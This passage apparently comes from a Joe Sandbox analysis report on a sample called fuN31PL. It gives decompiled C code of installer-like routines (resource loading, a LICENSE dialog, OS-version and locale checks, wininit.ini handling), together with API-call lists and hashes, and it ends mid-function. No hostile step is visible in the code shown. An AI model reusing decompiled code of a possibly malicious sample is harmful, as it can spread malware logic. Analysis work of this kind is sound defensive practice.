                                                                                                                                                                                                                                              0x001a6331
                                                                                                                                                                                                                                              0x001a6334
                                                                                                                                                                                                                                              0x001a6339
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a6339
                                                                                                                                                                                                                                              0x001a6319
                                                                                                                                                                                                                                              0x001a636b
                                                                                                                                                                                                                                              0x001a637d
                                                                                                                                                                                                                                              0x001a637d
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 001A171E: _vsnprintf.MSVCRT ref: 001A1750
                                                                                                                                                                                                                                              • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,001A51CA,00000004,00000024,001A2F71,?,00000002,00000000), ref: 001A62CD
                                                                                                                                                                                                                                              • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,001A51CA,00000004,00000024,001A2F71,?,00000002,00000000), ref: 001A62D4
                                                                                                                                                                                                                                              • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,001A51CA,00000004,00000024,001A2F71,?,00000002,00000000), ref: 001A631B
                                                                                                                                                                                                                                              • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 001A6345
                                                                                                                                                                                                                                              • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,001A51CA,00000004,00000024,001A2F71,?,00000002,00000000), ref: 001A6357
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                              • String ID: UPDFILE%lu
                                                                                                                                                                                                                                              • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                              • Opcode ID: 37c161033ad5766c3c53bd76b999739cb9fa37dffecf09e9d31bb953ac9124cf
                                                                                                                                                                                                                                              • Instruction ID: 617162264e68de2ed4f92d4799d13ee7d2f5a21457c9bc24f739aa0ecd7a7567
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 37c161033ad5766c3c53bd76b999739cb9fa37dffecf09e9d31bb953ac9124cf
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B21E1B9A00219ABDB149FA4CC459BFBB78FF4A710B040129FA06A3641DB359D46CBE0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                                                                              			E001A681F(void* __ebx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                                                                              				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                                                              				void* _v172;
                                                                                                                                                                                                                                              				int* _v176;
                                                                                                                                                                                                                                              				int _v180;
                                                                                                                                                                                                                                              				int _v184;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t19;
                                                                                                                                                                                                                                              				long _t31;
                                                                                                                                                                                                                                              				signed int _t35;
                                                                                                                                                                                                                                              				void* _t36;
                                                                                                                                                                                                                                              				intOrPtr _t41;
                                                                                                                                                                                                                                              				signed int _t44;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t36 = __ebx;
                                                                                                                                                                                                                                              				_t19 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                                                              				_t41 =  *0x1a81d8; // 0x0
                                                                                                                                                                                                                                              				_t43 = 0;
                                                                                                                                                                                                                                              				_v180 = 0xc;
                                                                                                                                                                                                                                              				_v176 = 0;
                                                                                                                                                                                                                                              				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                                                              					 *0x1a81d8 = 0;
                                                                                                                                                                                                                                              					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                              					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                                                              						L12:
                                                                                                                                                                                                                                              						_t41 =  *0x1a81d8; // 0x0
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t41 = 1;
                                                                                                                                                                                                                                              						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                                                              							goto L12;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t31 = RegQueryValueExA(_v172, 0x1a1140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                                                              							_t43 = _t31;
                                                                                                                                                                                                                                              							RegCloseKey(_v172);
                                                                                                                                                                                                                                              							if(_t31 != 0) {
                                                                                                                                                                                                                                              								goto L12;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t40 =  &_v176;
                                                                                                                                                                                                                                              								if(E001A66F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                                                              									goto L12;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                                                              									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                                                              										 *0x1a81d8 = _t41;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										goto L12;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E001A6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                                                              			}


















                                                                                                                                                                                                                                              0x001a681f
                                                                                                                                                                                                                                              0x001a682a
                                                                                                                                                                                                                                              0x001a6831
                                                                                                                                                                                                                                              0x001a6836
                                                                                                                                                                                                                                              0x001a683c
                                                                                                                                                                                                                                              0x001a683e
                                                                                                                                                                                                                                              0x001a6848
                                                                                                                                                                                                                                              0x001a6851
                                                                                                                                                                                                                                              0x001a685d
                                                                                                                                                                                                                                              0x001a6864
                                                                                                                                                                                                                                              0x001a6876
                                                                                                                                                                                                                                              0x001a693a
                                                                                                                                                                                                                                              0x001a693a
                                                                                                                                                                                                                                              0x001a687c
                                                                                                                                                                                                                                              0x001a687e
                                                                                                                                                                                                                                              0x001a6885
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a68d6
                                                                                                                                                                                                                                              0x001a68f4
                                                                                                                                                                                                                                              0x001a6900
                                                                                                                                                                                                                                              0x001a6902
                                                                                                                                                                                                                                              0x001a690a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a690c
                                                                                                                                                                                                                                              0x001a690c
                                                                                                                                                                                                                                              0x001a691c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a691e
                                                                                                                                                                                                                                              0x001a6924
                                                                                                                                                                                                                                              0x001a692b
                                                                                                                                                                                                                                              0x001a6932
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a692b
                                                                                                                                                                                                                                              0x001a691c
                                                                                                                                                                                                                                              0x001a690a
                                                                                                                                                                                                                                              0x001a6885
                                                                                                                                                                                                                                              0x001a6876
                                                                                                                                                                                                                                              0x001a6951

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 001A686E
                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000004A), ref: 001A68A7
                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 001A68CC
                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,001A1140,00000000,?,?,0000000C), ref: 001A68F4
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 001A6902
                                                                                                                                                                                                                                                • Part of subcall function 001A66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,001A691A), ref: 001A6741
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • Control Panel\Desktop\ResourceLocale, xrefs: 001A68C2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                              • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                              • API String ID: 3346862599-1109908249
                                                                                                                                                                                                                                              • Opcode ID: 3aa8c31af848cd07cf2404bcf3166e2b83a11a7ce17461de85343723f50ba275
                                                                                                                                                                                                                                              • Instruction ID: d8d2996a3d6715625ec1b653f57d19332743d30573e36107e801546aac5f8cf6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3aa8c31af848cd07cf2404bcf3166e2b83a11a7ce17461de85343723f50ba275
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93315E79A002189FDB219F11CC45BABB7B8EF47768F0801A9E949A2140DB309E89CF52
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E001A3A3F(void* __eflags) {
                                                                                                                                                                                                                                              				void* _t3;
                                                                                                                                                                                                                                              				void* _t9;
                                                                                                                                                                                                                                              				CHAR* _t16;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t16 = "LICENSE";
                                                                                                                                                                                                                                              				_t1 = E001A468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                              				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                              				 *0x1a8d4c = _t3;
                                                                                                                                                                                                                                              				if(_t3 != 0) {
                                                                                                                                                                                                                                              					_t19 = _t16;
                                                                                                                                                                                                                                              					if(E001A468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                                                              						if(lstrcmpA( *0x1a8d4c, "<None>") == 0) {
                                                                                                                                                                                                                                              							LocalFree( *0x1a8d4c);
                                                                                                                                                                                                                                              							L9:
                                                                                                                                                                                                                                              							 *0x1a9124 = 0;
                                                                                                                                                                                                                                              							return 1;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t9 = E001A6517(_t19, 0x7d1, 0, E001A3100, 0, 0);
                                                                                                                                                                                                                                              						LocalFree( *0x1a8d4c);
                                                                                                                                                                                                                                              						if(_t9 != 0) {
                                                                                                                                                                                                                                              							goto L9;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						 *0x1a9124 = 0x800704c7;
                                                                                                                                                                                                                                              						L2:
                                                                                                                                                                                                                                              						return 0;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					E001A44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					LocalFree( *0x1a8d4c);
                                                                                                                                                                                                                                              					 *0x1a9124 = 0x80070714;
                                                                                                                                                                                                                                              					goto L2;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				E001A44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              				 *0x1a9124 = E001A6285();
                                                                                                                                                                                                                                              				goto L2;
                                                                                                                                                                                                                                              			}






                                                                                                                                                                                                                                              0x001a3a46
                                                                                                                                                                                                                                              0x001a3a57
                                                                                                                                                                                                                                              0x001a3a5d
                                                                                                                                                                                                                                              0x001a3a63
                                                                                                                                                                                                                                              0x001a3a6a
                                                                                                                                                                                                                                              0x001a3a91
                                                                                                                                                                                                                                              0x001a3a9a
                                                                                                                                                                                                                                              0x001a3ad8
                                                                                                                                                                                                                                              0x001a3b13
                                                                                                                                                                                                                                              0x001a3b19
                                                                                                                                                                                                                                              0x001a3b1b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3b21
                                                                                                                                                                                                                                              0x001a3ae7
                                                                                                                                                                                                                                              0x001a3af4
                                                                                                                                                                                                                                              0x001a3afc
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3afe
                                                                                                                                                                                                                                              0x001a3a87
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3a87
                                                                                                                                                                                                                                              0x001a3aa8
                                                                                                                                                                                                                                              0x001a3ab3
                                                                                                                                                                                                                                              0x001a3ab9
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3ab9
                                                                                                                                                                                                                                              0x001a3a78
                                                                                                                                                                                                                                              0x001a3a82
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001A46A0
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: SizeofResource.KERNEL32(00000000,00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46A9
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001A46C3
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: LoadResource.KERNEL32(00000000,00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46CC
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: LockResource.KERNEL32(00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46D3
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: memcpy_s.MSVCRT ref: 001A46E5
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46EF
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,001A2F64,?,00000002,00000000), ref: 001A3A5D
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 001A3AB3
                                                                                                                                                                                                                                                • Part of subcall function 001A44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001A4518
                                                                                                                                                                                                                                                • Part of subcall function 001A44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 001A4554
                                                                                                                                                                                                                                                • Part of subcall function 001A6285: GetLastError.KERNEL32(001A5BBC), ref: 001A6285
                                                                                                                                                                                                                                              • lstrcmpA.KERNEL32(<None>,00000000), ref: 001A3AD0
                                                                                                                                                                                                                                              • LocalFree.KERNEL32 ref: 001A3B13
                                                                                                                                                                                                                                                • Part of subcall function 001A6517: FindResourceA.KERNEL32(001A0000,000007D6,00000005), ref: 001A652A
                                                                                                                                                                                                                                                • Part of subcall function 001A6517: LoadResource.KERNEL32(001A0000,00000000,?,?,001A2EE8,00000000,001A19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 001A6538
                                                                                                                                                                                                                                                • Part of subcall function 001A6517: DialogBoxIndirectParamA.USER32(001A0000,00000000,00000547,001A19E0,00000000), ref: 001A6557
                                                                                                                                                                                                                                                • Part of subcall function 001A6517: FreeResource.KERNEL32(00000000,?,?,001A2EE8,00000000,001A19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 001A6560
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,001A3100,00000000,00000000), ref: 001A3AF4
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                              • String ID: <None>$LICENSE
                                                                                                                                                                                                                                              • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                              • Opcode ID: 49eb9fae2f8a20c78201c15e0fa1d7153af83ecaeb790c8234b6828cc8e559e3
                                                                                                                                                                                                                                              • Instruction ID: 717a7530d70b481f7756386c40582f675005acb91dd70caad5f6071c059a4c68
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 49eb9fae2f8a20c78201c15e0fa1d7153af83ecaeb790c8234b6828cc8e559e3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E110878300201BBD725AF76AD09F277ABAEFDB710F10413EB546D69A1DBB98840C660
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                                                                              			E001A24E0(void* __ebx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t7;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				long _t26;
                                                                                                                                                                                                                                              				signed int _t27;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t20 = __ebx;
                                                                                                                                                                                                                                              				_t7 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                                                              				_t25 = 0x104;
                                                                                                                                                                                                                                              				_t26 = 0;
                                                                                                                                                                                                                                              				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                              					E001A658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                                                              					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                                                              					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                                                              					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                              						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                                                              						_lclose(_t25);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E001A6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                                                              			}











                                                                                                                                                                                                                                              0x001a24e0
                                                                                                                                                                                                                                              0x001a24eb
                                                                                                                                                                                                                                              0x001a24f2
                                                                                                                                                                                                                                              0x001a24f7
                                                                                                                                                                                                                                              0x001a2504
                                                                                                                                                                                                                                              0x001a250e
                                                                                                                                                                                                                                              0x001a251d
                                                                                                                                                                                                                                              0x001a252c
                                                                                                                                                                                                                                              0x001a2541
                                                                                                                                                                                                                                              0x001a2546
                                                                                                                                                                                                                                              0x001a2553
                                                                                                                                                                                                                                              0x001a2555
                                                                                                                                                                                                                                              0x001a2555
                                                                                                                                                                                                                                              0x001a2546
                                                                                                                                                                                                                                              0x001a256c

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 001A2506
                                                                                                                                                                                                                                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 001A252C
                                                                                                                                                                                                                                              • _lopen.KERNEL32 ref: 001A253B
                                                                                                                                                                                                                                              • _llseek.KERNEL32(00000000,00000000,00000002), ref: 001A254C
                                                                                                                                                                                                                                              • _lclose.KERNEL32(00000000), ref: 001A2555
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                              • String ID: wininit.ini
                                                                                                                                                                                                                                              • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                              • Opcode ID: b1dc75cc3e943ad6da0d9601ad55e69c5c7dbd1e8f1d37ffc3c69e3b4c704340
                                                                                                                                                                                                                                              • Instruction ID: a70bdba2617f1781f6153aaf1f119b5cf16696c8b354cb6481c0a596220d784c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1dc75cc3e943ad6da0d9601ad55e69c5c7dbd1e8f1d37ffc3c69e3b4c704340
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47019E36A001186BC7209B69DD08EDBBB7DEF87760F400155FA49D3190DB748E86CAA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                                                                                                              			E001A36EE(CHAR* __ecx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                                                              				signed int _v420;
                                                                                                                                                                                                                                              				signed int _v424;
                                                                                                                                                                                                                                              				CHAR* _v428;
                                                                                                                                                                                                                                              				CHAR* _v432;
                                                                                                                                                                                                                                              				signed int _v436;
                                                                                                                                                                                                                                              				CHAR* _v440;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t72;
                                                                                                                                                                                                                                              				CHAR* _t77;
                                                                                                                                                                                                                                              				CHAR* _t91;
                                                                                                                                                                                                                                              				CHAR* _t94;
                                                                                                                                                                                                                                              				int _t97;
                                                                                                                                                                                                                                              				CHAR* _t98;
                                                                                                                                                                                                                                              				signed char _t99;
                                                                                                                                                                                                                                              				CHAR* _t104;
                                                                                                                                                                                                                                              				signed short _t107;
                                                                                                                                                                                                                                              				signed int _t109;
                                                                                                                                                                                                                                              				short _t113;
                                                                                                                                                                                                                                              				void* _t114;
                                                                                                                                                                                                                                              				signed char _t115;
                                                                                                                                                                                                                                              				short _t119;
                                                                                                                                                                                                                                              				CHAR* _t123;
                                                                                                                                                                                                                                              				CHAR* _t124;
                                                                                                                                                                                                                                              				CHAR* _t129;
                                                                                                                                                                                                                                              				signed int _t131;
                                                                                                                                                                                                                                              				signed int _t132;
                                                                                                                                                                                                                                              				CHAR* _t135;
                                                                                                                                                                                                                                              				CHAR* _t138;
                                                                                                                                                                                                                                              				signed int _t139;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t72 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                                                              				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                              				_t115 = __ecx;
                                                                                                                                                                                                                                              				_t135 = 0;
                                                                                                                                                                                                                                              				_v432 = __ecx;
                                                                                                                                                                                                                                              				_t138 = 0;
                                                                                                                                                                                                                                              				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                                                              					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                                                              					_t119 = 2;
                                                                                                                                                                                                                                              					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                                                              					__eflags = _t77;
                                                                                                                                                                                                                                              					if(_t77 == 0) {
                                                                                                                                                                                                                                              						_t119 = 0;
                                                                                                                                                                                                                                              						__eflags = 1;
                                                                                                                                                                                                                                              						 *0x1a8184 = 1;
                                                                                                                                                                                                                                              						 *0x1a8180 = 1;
                                                                                                                                                                                                                                              						L13:
                                                                                                                                                                                                                                              						 *0x1a9a40 = _t119;
                                                                                                                                                                                                                                              						L14:
                                                                                                                                                                                                                                              						__eflags =  *0x1a8a34 - _t138; // 0x0
                                                                                                                                                                                                                                              						if(__eflags != 0) {
                                                                                                                                                                                                                                              							goto L66;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						__eflags = _t115;
                                                                                                                                                                                                                                              						if(_t115 == 0) {
                                                                                                                                                                                                                                              							goto L66;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_v428 = _t135;
                                                                                                                                                                                                                                              						__eflags = _t119;
                                                                                                                                                                                                                                              						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                                                              						_t11 =  &_v420;
                                                                                                                                                                                                                                              						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                                                              						__eflags =  *_t11;
                                                                                                                                                                                                                                              						_v440 = _t115;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_v424 = _t135 * 0x18;
                                                                                                                                                                                                                                              							_v436 = E001A2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                                                              							_t91 = E001A2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                                                              							_t123 = _v436;
                                                                                                                                                                                                                                              							_t133 = 0x54d;
                                                                                                                                                                                                                                              							__eflags = _t123;
                                                                                                                                                                                                                                              							if(_t123 < 0) {
                                                                                                                                                                                                                                              								L32:
                                                                                                                                                                                                                                              								__eflags = _v420 - 1;
                                                                                                                                                                                                                                              								if(_v420 == 1) {
                                                                                                                                                                                                                                              									_t138 = 0x54c;
                                                                                                                                                                                                                                              									L36:
                                                                                                                                                                                                                                              									__eflags = _t138;
                                                                                                                                                                                                                                              									if(_t138 != 0) {
                                                                                                                                                                                                                                              										L40:
                                                                                                                                                                                                                                              										__eflags = _t138 - _t133;
                                                                                                                                                                                                                                              										if(_t138 == _t133) {
                                                                                                                                                                                                                                              											L30:
                                                                                                                                                                                                                                              											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                                                              											_t115 = 0;
                                                                                                                                                                                                                                              											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                                                              											__eflags = _t138 - _t133;
                                                                                                                                                                                                                                              											_t133 = _v432;
                                                                                                                                                                                                                                              											if(__eflags != 0) {
                                                                                                                                                                                                                                              												_t124 = _v440;
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                                                              												_v420 =  &_v268;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											__eflags = _t124;
